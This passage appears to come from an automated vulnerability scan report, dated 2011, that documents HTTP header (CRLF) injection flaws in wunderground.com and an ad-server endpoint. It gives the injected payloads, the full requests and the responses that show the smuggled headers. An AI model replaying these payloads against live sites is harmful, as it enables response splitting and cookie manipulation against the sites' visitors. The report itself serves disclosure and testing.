<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the s request parameter is copied into the OAS_DE_ERROR response header. The payload c5712%0d%0a3c8b5d6e8a7 was submitted in the s parameter. This caused a response containing an injected HTTP header.
Response
HTTP/1.1 500 Internal Server Error
Date: Sun, 20 Mar 2011 13:31:36 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
OAS_DE_ERROR: Cannot convert 'c5712
3c8b5d6e8a7' to bool. request to 'network.realmedia.com' for '/RealMedia/ads/adstream.cap/574659390', referer 'http://redcated/APM/iview/142856443/direct;wi.300;hi.250/01?click=http://viacom.adbureau.net/accipiter/adclick/CID=000014700000000000000000/height=250/width=300/site=SW.NOL/aamsz=300X250/NCP=1/relocate=', handler 'cap-add'
Content-Length: 621
Connection: close
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_o1efm_qppm_iuuq=ffffffff09419e3145525d5f4f58455e445a4a423660;expires=Sun, 20-Mar-2011 05:22:14 GMT;path=/;httponly
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"> <html><head> <title>500 Internal Server Error</title> </head><body> <h1>Internal Server Error</h1> <p>The server encountered an internal error or mis ...[SNIP]...
The value of the id request parameter is copied into the Set-Cookie response header. The payload 7d212%0d%0a1bcc71500d5 was submitted in the id parameter. This caused a response containing an injected HTTP header.
Request
GET /dotunset.php?id=7d212%0d%0a1bcc71500d5 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://usweb.dotomi.com/renderer/delPublishersCookies.html?pid=13200&rurl=http%3A%2F%2Fads.dotomi.com%2Fads.php%3Fpid%3D13200%26mtg%3D0%26ms%3D11%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D300%26rheight%3D250%26pp%3D0%26cg%3D2084%26tz%3D300&u=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&mpc=0&p=13200&pcg=2084&cg=2084&o=2084
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:21:02 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag.7d212
1bcc71500d5=1; expires=Sun, 20 Mar 2011 13:21:01 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43
GIF89a.............!.......,...........D..
1.50. http://www.wunderground.com/dotunset.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.wunderground.com
Path: /dotunset.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Set-Cookie response header. The payload 5e99f%0d%0a4178bf0618c was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
Request
GET /dotunset.php?id=/5e99f%0d%0a4178bf0618c2084 HTTP/1.1
Host: www.wunderground.com
Proxy-Connection: keep-alive
Referer: http://usweb.dotomi.com/renderer/delPublishersCookies.html?pid=13200&rurl=http%3A%2F%2Fads.dotomi.com%2Fads.php%3Fpid%3D13200%26mtg%3D0%26ms%3D11%26btg%3D1%26mp%3D1%26dres%3Diframe%26rwidth%3D300%26rheight%3D250%26pp%3D0%26cg%3D2084%26tz%3D300&u=WH9qYVd2Q3FGAWJeBgV%2BWQlbaXsQfgZCDFxlX1ZL&mpc=0&p=13200&pcg=2084&cg=2084&o=2084
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.151 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK
Date: Sun, 20 Mar 2011 13:21:11 GMT
Server: Apache/1.3.33 (Unix) PHP/4.4.0
X-Powered-By: PHP/4.4.0
Set-Cookie: dottag./5e99f
4178bf0618c2084=1; expires=Sun, 20 Mar 2011 13:21:10 GMT; path=/; domain=.wunderground.com
Expires: Wed, 11 Nov 1998 11:11:11 GMT
Cache-Control: must-revalidate
Connection: close
Content-Type: image/gif
Content-Length: 43
GIF89a.............!.......,...........D..
Report generated by XSS.CX at Sun Mar 20 09:23:19 CDT 2011.